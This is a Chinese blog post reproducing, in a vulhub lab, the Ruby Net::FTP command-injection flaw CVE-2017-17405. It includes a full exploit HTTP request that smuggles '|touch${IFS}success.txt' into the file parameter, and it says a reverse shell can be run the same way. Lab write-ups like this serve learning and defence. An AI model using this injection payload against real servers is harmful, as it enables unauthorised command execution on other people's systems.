vulhub漏洞复现59_Ruby

已于 2022-02-12 11:15:20 修改
阅读量417 收藏
点赞数
文章标签: ubuntu linux 服务器 安全 web安全
于 2022-02-12 11:13:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122893784
版权

CVE-2017-17405_Ruby Net::FTP 模块命令注入漏洞

漏洞详情

Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了`open`函数。而在ruby中,`open`函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。

环境搭建

靶场:192.168.4.10_ubuntu

编译及运行漏洞环境:

#docker-compose build

#docker-compose up -d

环境启动后,访问`http://your-ip:8080/`将可以看到一个HTTP服务。这个HTTP服务的作用是,我们访问`http://your-ip:8080/download?uri=ftp://example.com:2121/&file=vulhub.txt`,它会从example.com:2121这个ftp服务端下载文件vulhub.txt到本地,并将内容返回给用户。

漏洞复现

因为这是一个FTP客户端的漏洞,所以我们需要先运行一个可以被访问到的服务端。比如使用python3:

```

# 安装pyftpdlib

#Apt-get update

#Apt-get install pip

#Pip3 install pyftpdlib

# 在当前目录下启动一个ftp服务器,默认监听在`0.0.0.0:2121`端口

python3 -m pyftpdlib -p 2121 -i 0.0.0.0

```

然后即可开始利用漏洞。注入命令`|touch${IFS}success.txt`(空格用`${IFS}`代替,原因不表),发送如下数据包即可(其中uri指定的ftp服务器就是我用python运行的一个简单的ftp server,其中无需放置任何文件):

/*

GET /download?uri=ftp://192.168.4.29:2121/&file=|touch${IFS}success.txt HTTP/1.1

Host: 192.168.4.10:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

Connection: close

*/

然后进入docker容器内,可见success.txt已被创建:

 #同理可执行反弹shell

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tr0ll1 vulnhub靶场通关记录(FTP)
weixin_62621015的博客
03-09 211
Tr0ll vulnhub靶场个人通关记录 ;
Vulhub - Ruby On Rails 路径穿越漏洞(CVE-2018-3760)复现
多崎巡礼的博客
10-30 3688
Ruby On Rails 路径穿越漏洞(CVE-2018-3760) Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到...
vulhub-Legacy:Hangtuah靶机渗透详细流程
nwonknu16的博客
05-27 2019
根据之前的命令历史,猜测有一个定时任务,将/home/pendekar/gold路径下随机文件路径写入到official_letter.txt中,而send_letter.txt的内容就是该随机文件的内容。查看.bash_history,发现反复出现的两个可疑文件send_letter.txt和official_letter.txt,且有两条覆写命令中包含敏感文件/etc/passwd和id_rsa。查找可疑文件,发现/var/www下存在可疑文件夹chest和历史命令文件.bash_history。
Vulhub靶场在Centos7上的搭建
AD_CSY的博客
06-18 1097
前言 Vulhub是一个开源的漏洞靶场,无需你有很强的docker知识,只需要简单的几句命令,就可以搭建一个完整的靶场环境。官方推荐使用Ubuntu,但是昨天我在docker的安装上,被折磨得身心俱疲,后来在网上找到一篇博客,详细介绍了Centos7上搭建Vulhub靶场,在这里给大家分享一下。 前期准备 这里vulhub和docker-compose不是必须先提前下载好,只是我在安装的过程中遇到了一些问题,于是我直接下载好,利用File Zilla(FTP传输),直接传到我的centos7上。 cento
Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)漏洞复现
weixin_51804748的博客
01-17 1967
漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Vulhub(CVE-2017-17405) 环境搭建 靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3428
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
tor_ruby:tor_ruby
07-11
TOR_RUBY 此脚本是 ruby​​ 如何与 Tor 交互的工作示例。 它使用机械化来获取当前的 ip 地址(来自 ifconfig.org/ip),然后将新的 ip 地址发送给 tor(使用 tor-control-protocol)。 最后检查ip地址是否改变并...
RubyNotesForProfessionals.zip_Ruby编程_Ruby_
08-09
Ruby是一种面向对象的、动态类型的编程语言,以其简洁、优雅的语法和强大的元编程能力而闻名。这本书"RubyNotesForProfessionals"很可能是为了帮助读者深入理解和掌握Ruby编程所编写的。Ruby的设计哲学强调代码的...
Challenge_memcached_ruby
04-05
Challenge_memcached_ruby 作为服务器执行:在命令行界面上,请转到程序下载目录,例如:C:Users / usuario / Downloads / Challenge_ruby_BC 写:“ interactuar”启动服务器以客户身份执行: 服务器启动后,在...
text_text_ruby
06-07
Ruby编程语言中,开发脚本来利用外部API服务是一种常见的实践。在这个特定的案例中,我们关注的是一个名为"text_text_ruby"的项目,它主要用于通过textbelt API从命令行发送短信。让我们深入探讨一下这个脚本所...
prueba_modulo_ruby
03-27
标题“prueba_modulo_ruby”暗示我们正在讨论一个与Ruby编程语言相关的模块或测试项目。在Ruby中,模块(Module)是一种组织代码的方式,它允许我们封装相关的类、方法和常量,以便于代码重用和命名空间管理。描述中...
vulhub】Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)
weixin_42884199的博客
12-07 1071
前言 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 影响版本: Struts 2.0.0 - Struts 2.5.20 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload view-source:http://192.168.150.146:8080/index.action?i
Ubuntu/Kali简洁高效安装最新版的docker-compose
YJ_12340的博客
07-16 450
可以看到这里也是成功下载了此时的最新版本 v2.22.0。最后查看一点docker-composer的版本。
ORB_SLAM2 ORBSLAM2 Ubuntu20.04 ROS Noetic虚拟机镜像下载
最新发布
bluesky199199的博客
07-19 133
链接:https://pan.baidu.com/s/16R7Pb6LjgR5SeoeBSZfgaQ?
Ubuntu22.04版本的YOLOv8TensorRT模型部署
qq_53545309的博客
07-19 248
如何使用代码导出onnx文件。你将会的到例如:yolov8n.trt、yolov8s.trt、yolov8m.trt等文件。yaml是官方提供的配置文件,如果是自己训练的模型,那就设置为自定义yaml文件即可。
Ubuntu 查询未更新的包 进行手动更新
小婷
07-19 68
lsb_release -a 查询ubuntu的版本号,我这边是20.04。apt list --upgradable 查询未更新的包。中间遇到输入选择,输入y即可。
Linux(CentOS、Ubuntu等等)中安装Erlang和Elixir
07-19 120
Linux(CentOS、Ubuntu等等)中安装Erlang和Elixir
WSL-Ubuntu20.04环境使用YOLOv8 TensorRT推理加速
ice
07-15 375
在阅读本章内容之前,需要把部署环境以及训练环境都安装好。
rosbag转video后视频无法播放/黑屏(ubuntu环境)
qq_43741419的博客
07-19 117
终端的命令是显示转换成功的,但是video显示无法播放,在下载了vlc后也是黑屏。这个时候我把video放到windows的播放器里,但是显示的是。毋庸置疑的是,其实我们转换的代码和rosbag包是没问题的。系统中的终端上安装缺少的编解码器。3.使用以下命令继续安装。安装就直接:OK,YES。
To use the pure-ruby reactor, require 'em/pure_ruby'
05-10
Thank you for your response. However, I am not sure what you are referring to. Could you please provide more context or information about the topic you are discussing?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值